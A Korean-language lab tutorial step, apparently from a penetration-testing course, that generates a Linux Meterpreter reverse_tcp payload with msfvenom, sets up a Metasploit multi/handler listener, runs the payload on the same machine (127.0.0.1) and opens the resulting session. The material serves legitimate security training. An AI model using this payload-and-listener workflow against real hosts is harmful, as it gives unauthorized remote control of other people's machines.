그래픽 대상에 Meterpreter 세션 설정
이 단계에서는 단일 머신에서 완전한 공격 주기를 시뮬레이션합니다. msfvenom을 사용하여 페이로드를 생성하고, msfconsole을 사용하여 리스너를 설정한 다음, 페이로드를 실행하여 자체 머신과의 Meterpreter 세션을 설정합니다. 이는 침투 테스트 기술을 연습하는 안전하고 일반적인 방법입니다.
먼저 터미널을 열고 msfvenom을 사용하여 Linux Meterpreter 페이로드를 생성합니다. 이 명령은 실행 시 리스너에 다시 연결되는 실행 파일을 생성합니다.
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o ~/project/payload.elf
-p: 사용할 페이로드를 지정합니다.
LHOST=127.0.0.1: "수신 대기 호스트" IP 주소입니다. 리스너가 동일한 머신에 있기 때문에 127.0.0.1을 사용합니다.
LPORT=4444: 다시 연결할 포트입니다.
-f elf: Linux 용 실행 파일인 출력 형식입니다.
-o: 출력 파일 이름입니다.
다음으로, 생성된 페이로드를 실행 가능하게 만듭니다.
chmod +x ~/project/payload.elf
이제 페이로드로부터의 연결을 수신할 리스너를 설정해야 합니다. 메타스플로잇 프레임워크 콘솔을 조용한 모드로 시작합니다.
msfconsole -q
msfconsole 내에서 multi/handler를 구성하여 들어오는 연결을 수신 대기합니다. 다음 명령을 하나씩 입력합니다.
use multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
이제 콘솔을 계속 사용할 수 있도록 리스너를 백그라운드 작업으로 실행합니다.
exploit -j
핸들러가 시작되었다는 메시지가 표시되어야 합니다. 이제 페이로드를 실행해야 합니다. 터미널 창에서 + 아이콘을 클릭하여 새로운 두 번째 터미널 탭을 엽니다. 이 새 탭에서 생성한 페이로드를 실행합니다.
~/project/payload.elf
msfconsole이 있는 첫 번째 터미널 탭으로 돌아갑니다. Meterpreter 세션이 열렸음을 나타내는 메시지가 표시되어야 합니다. 이를 확인하고 상호 작용하려면 활성 세션을 나열합니다.
sessions -l
세션 ID(아마도 1) 가 있는 새 세션이 표시됩니다. 해당 ID 를 사용하여 상호 작용합니다.
sessions -i 1
프롬프트가 meterpreter >로 변경되어 세션을 제어하고 있음을 확인합니다.